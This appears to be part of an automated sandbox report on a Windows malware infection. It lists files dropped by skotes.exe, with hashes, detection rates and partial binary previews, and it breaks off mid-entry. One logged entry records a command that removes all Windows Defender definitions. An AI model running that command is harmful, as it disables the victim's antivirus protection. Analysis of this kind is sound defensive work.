                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):957952
                                                                                                                                                                                                                                        Entropy (8bit):7.9986004015143015
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:h2LddHrlBe4LpCuw8VYHcx5WK1zF7JkLYiY:mdZKspwDa5WK/JkLc
                                                                                                                                                                                                                                        MD5:5B99682CB740202D783DDE58CA97F045
                                                                                                                                                                                                                                        SHA1:CECAE054552CE295FEAA0717D2A33E870ADDCADD
                                                                                                                                                                                                                                        SHA-256:724E283E1BB29A150C9BEBC21BDF0E250E2D87257BF86C889BBE7544329C6882
                                                                                                                                                                                                                                        SHA-512:C37A2CB06407729344ADB85D814223A24EC4FA65F711C7F02C0E77395EC969B7E1BD64A6F5806D4E2D88C8461587D68B6AAE3378D2CF5C92F1ADE2AACC13F2B2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg................................. ........@.. ....................................`.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......h................!...............................................(....*..(....*.~....:....r...p.....(....o....s.........~....*.~....*.......*j(....r9..p~....o....t....*V.rI..p .......o....&*j(....(....r]..po....(....*2(.....o....*...0..g.........8.....(..........&......,.s......r...p(....o.....r...p(....o.....o .......io!..........9.....o".....*...................".6X....................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1880576
                                                                                                                                                                                                                                        Entropy (8bit):7.947827107801024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:ZRGDbjz7g+LRMpnd6dc8dwpW+8cYsjL1i:ZRGDrky0nd6dcmUT8AjL1i
                                                                                                                                                                                                                                        MD5:FF279F4E5B1C6FBDA804D2437C2DBDC8
                                                                                                                                                                                                                                        SHA1:2FEB3762C877A5AE3CA60EEEBC37003AD0844245
                                                                                                                                                                                                                                        SHA-256:E115298AB160DA9C7A998E4AE0B72333F64B207DA165134CA45EB997A000D378
                                                                                                                                                                                                                                        SHA-512:C7A8BBCB122B2C7B57C8B678C5EED075EE5E7C355AFBF86238282D2D3458019DA1A8523520E1A1C631CD01B555F7DF340545FD1E44AD678DC97C40B23428F967
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................0J...........@..........................`J.....i.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...xnuzvlhe.0..../......^..............@...tzuttanx..... J.....................@....taggant.0...0J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):776832
                                                                                                                                                                                                                                        Entropy (8bit):7.859727158445845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                                                                        MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                        SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                                                                        SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                                                                        SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1885696
                                                                                                                                                                                                                                        Entropy (8bit):7.9502129539309525
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:xygWjRQ3HLL/piTRSyEvGqpGl3Ao1cVPeb3ymHw2NG:ggrHpi8yhqclT1vtN
                                                                                                                                                                                                                                        MD5:25FB9C54265BBACC7A055174479F0B70
                                                                                                                                                                                                                                        SHA1:4AF069A2EC874703A7E29023D23A1ADA491B584E
                                                                                                                                                                                                                                        SHA-256:552F8BE2C6B2208A89C728F68488930C661B3A06C35A20D133EF7D3C63A86B9C
                                                                                                                                                                                                                                        SHA-512:7DFD9E0F3FA2D68A6CE8C952E3B755559DB73BB7A06C95AD6ED8AC16DEDB49BE8B8337AFC07C9C682F0C4BE9DB291A551286353E2E2B624223487DC1C8B54668
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................J.....%-....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...uzxdwyvi.P... 0..B...^..............@...efzdldig.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1017920001\194df6b68b.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2039808
                                                                                                                                                                                                                                        Entropy (8bit):7.95190511268852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:i8yCHGX33Su8Usgk5msPWY14O5Sb7D0Otq+qMnf/w4/T:iPXyuog/Av5/QFqMnf/ww
                                                                                                                                                                                                                                        MD5:6D4A011DDE3AE4DD05553B27D6FBFC75
                                                                                                                                                                                                                                        SHA1:EB13D57E83CA18083A52BD4927E6039A0AD87F1E
                                                                                                                                                                                                                                        SHA-256:DEC151D71C758D3ED3D86403DC1DEB28ECF80793144E32BC9EB0FC76D5209E86
                                                                                                                                                                                                                                        SHA-512:FDA917FEF5BA08FEB485AB713DD03CA8AD40A5F451698F29DC356ED067967EC866F9D93725F79E79E13D282C01AD2754E15C02E162497B6626CC8829196CB5C6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........M...........@...........................M.....RL....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..+..........V..............@...fhxxuwls......2......X..............@...vzpihbtm......M.....................@....taggant.0....M.."..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21504
                                                                                                                                                                                                                                        Entropy (8bit):5.336742061370928
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:JiynHMEyyp/He7ik+KcJB669mNPBqVgYERHtNNVYISZS1d7RroV5:PHvtm7ik+KcJB6jRHkISZShkn
                                                                                                                                                                                                                                        MD5:14BECDF1E2402E9AA6C2BE0E6167041E
                                                                                                                                                                                                                                        SHA1:72CBBAE6878F5E06060A0038B25EDE93B445F0DF
                                                                                                                                                                                                                                        SHA-256:7A769963165063758F15F6E0CECE25C9D13072F67FA0D3C25A03A5104FE0783A
                                                                                                                                                                                                                                        SHA-512:16B837615505F352E134AFD9D8655C9CABFA5BFCFBEE2C0C34F2D7D9588AA71F875E4E5FEB8CDF0F7BACC00F7C1CA8DABD3B3D92AFC99ABF705C05C78E298B4A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pm;..........."...0..J..........:i... ........@.. ....................................`..................................h..O...................................Th..8............................................ ............... ..H............text...@I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H........6..p1...........................................................0..8.......s2.....(....}<.....}=.....};....|<.....(...+.|<...(....*.0..P........~.........,B.r...p(.....rc..p(.....(.....r...p.(....(......(....o......(......*.0..8.......s,.....(....}......}......}.....|......(...+.|....(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\??? ??\Display (1).png

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):709231
                                                                                                                                                                                                                                        Entropy (8bit):7.928265744460553
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+LL4iKvkzkKla4OFrrOD3UfffDAgFPJ4G+rx1z5DO3eey7DXQ8zqIF4YLMAiu7:aku9a4OJOIfpRmr/1DO3vyI8j4YwM7
                                                                                                                                                                                                                                        MD5:D0A5DC8EE956E9180DE9E4B78BC5F45B
                                                                                                                                                                                                                                        SHA1:CACCAAE3EBA1A297F6213254AA4B1DA3F9B97AA5
                                                                                                                                                                                                                                        SHA-256:2EB65E03EB327CFE084D50398B4C85CB15519E50D2228073F6F0A9D5C1C5CA1E
                                                                                                                                                                                                                                        SHA-512:57909E38090D2A960D191BA8C42DE41A3D9899E01AE152F2F1276723857408C67F826FA8610E76788CB592C3E725EF88BAB76C4F7A2F501B77963258933985A0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u...SUjIron.../....Kso.;y.}.r..6..B.}'@............G....l......A ....D.H..H.$...o....]...:%.(...k...Z{.S.-..\{.j..z..&.jB.;7...{...-.sF.......6..:....s.3_kD..H_F=.W/..=-}g.R?..P;..}.z.....#.v..#..d...V..Nzi.R..bG..(V..~B..}....q/.....1+........;...S....R...#..[..G<.S..|.+.2..xf...tE...}_{z...jI.WE\.....=.A.....;..9..aQ?di......Q..#-...........~.....P......m....}..Z...O.g.L.....S.4@l.3.%......P?.......~C......{+...o.v.R.{O..$...}a`.C....D.'.....+.}@....b.`...}...OD..+...1...Z..........q..{.0.<...3.q..wU....7.....{q....}1>...7.......a.^1g....{,.}....-..]..>..{.{.1.......+L.9.b;.X..O^..v.=.1...wY.Z....!......v...0..%.. Q...*6q.]a..q.....w..w...x{..p[j.w....m.......V0...k...-)o.......F.ZZb.O..u|...v.-..+6.c.......&..s.........}.nN.owK....lB.v..y...Yq...3n.}......!V.~S5o...Yq_....Z....qnF\.[....y........>1.....s....y..|......i7....7..ru=....=..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):894
                                                                                                                                                                                                                                        Entropy (8bit):3.1136093883777107
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q58KRBubdpkoPAGdjrBN+NF5Zk9+MlWlLehW51IC4N+NFZI:QOaqdmOFdjrL+NC+kWResLID+Nc
                                                                                                                                                                                                                                        MD5:98E7ECD40B422D1CD492C9D59903D500
                                                                                                                                                                                                                                        SHA1:464AD4BA6919F574256C1BBD0FC4E09633264A34
                                                                                                                                                                                                                                        SHA-256:D497018A7EFBF33BD58E8732A08F1C00B127B85C312675E9A4F00ABE99EB252C
                                                                                                                                                                                                                                        SHA-512:A6C35D28B7DD8AA5B2BDC1617B7427BB347233D594E5194765EDCE5EB02E16955BB99406830E53DB0512BF2B5180D864732302AD3558D767427FB587443810FF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 1.9. .. 2.0.2.4. .1.6.:.1.1.:.1.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 1.9. .. 2.0.2.4. .1.6.:.1.1.:.1.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RES2DEF.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Thu Dec 19 22:19:55 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1376
                                                                                                                                                                                                                                        Entropy (8bit):4.117181464430057
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:HmO9w65dyHMwK3NoxXNwI+ycuZhNQrakSpEPNnqSQEgd:h5EzK3NQm1ulSa3mqSZ0
                                                                                                                                                                                                                                        MD5:F2D066593AF7D7F84517882C52FE1DA1
                                                                                                                                                                                                                                        SHA1:4999F61F6CF6BC1C4A738E8EA9AC8D81276DD066
                                                                                                                                                                                                                                        SHA-256:3DDB3642A7BA1152DE3CA80A1E9C119E59A4FC9E9885CE9DD3A58DCA87B93526
                                                                                                                                                                                                                                        SHA-512:48011BA2DC84C2B9B6F3F6397D8F86C1D25AA977C9EED225A1E02D0B80E4E0D8EA44C99D3AE3102436E92D69450F1CD60A1F7297F8682161F9C622BD4F63811B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L.....dg.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........T....c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP................=...."S ..6.O...........5.......C:\Users\user\AppData\Local\Temp\RES2DEF.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.s.o.p.u.e.t...d.l.l.....(.....L.e.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI51602\VCRUNTIME140.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98224
                                                                                                                                                                                                                                        Entropy (8bit):6.452201564717313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                                                                                        MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                                                                                        SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                                                                                        SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                                                                                        SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pyd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):83736
                                                                                                                                                                                                                                        Entropy (8bit):6.595094797707322
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                                                                                                                        MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                                                                                                                        SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                                                                                                                        SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                                                                                                                        SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59672
                                                                                                                                                                                                                                        Entropy (8bit):7.815495306851539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:lAkx+GKRIxcWVGXWYOIDcPiBFCx/YzPILLPDM7SyGPxvI:ikx6uWX3xlBFCRYrILLPDMkxA
                                                                                                                                                                                                                                        MD5:31859B9A99A29127C4236968B87DBCBB
                                                                                                                                                                                                                                        SHA1:29B4EE82AA026C10FE8A4F43B40CBD8EC7EA71E5
                                                                                                                                                                                                                                        SHA-256:644712C3475BE7F02C2493D75E6A831372D01243ACA61AA8A1418F57E6D0B713
                                                                                                                                                                                                                                        SHA-512:FEC3AB9CE032E02C432D714DE0D764AAB83917129A5E6EECA21526B03176DA68DA08024D676BC0032200B2D2652E6D442CA2F1EF710A7408BD198995883A943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." .............p...........................................@............`.........................................H<.......9.......0..........D............<.......................................%..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pyd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109336
                                                                                                                                                                                                                                        Entropy (8bit):7.935778322595252
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
                                                                                                                                                                                                                                        MD5:7CDC590AC9B4FFA52C8223823B648E5C
                                                                                                                                                                                                                                        SHA1:C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
                                                                                                                                                                                                                                        SHA-256:F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
                                                                                                                                                                                                                                        SHA-512:919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI51602\_hashlib.pyd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):36120
                                                                                                                                                                                                                                        Entropy (8bit):7.666263818459696
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
                                                                                                                                                                                                                                        MD5:659A5EFA39A45C204ADA71E1660A7226
                                                                                                                                                                                                                                        SHA1:1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
                                                                                                                                                                                                                                        SHA-256:B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
                                                                                                                                                                                                                                        SHA-512:386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI51602\_lzma.pyd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87832
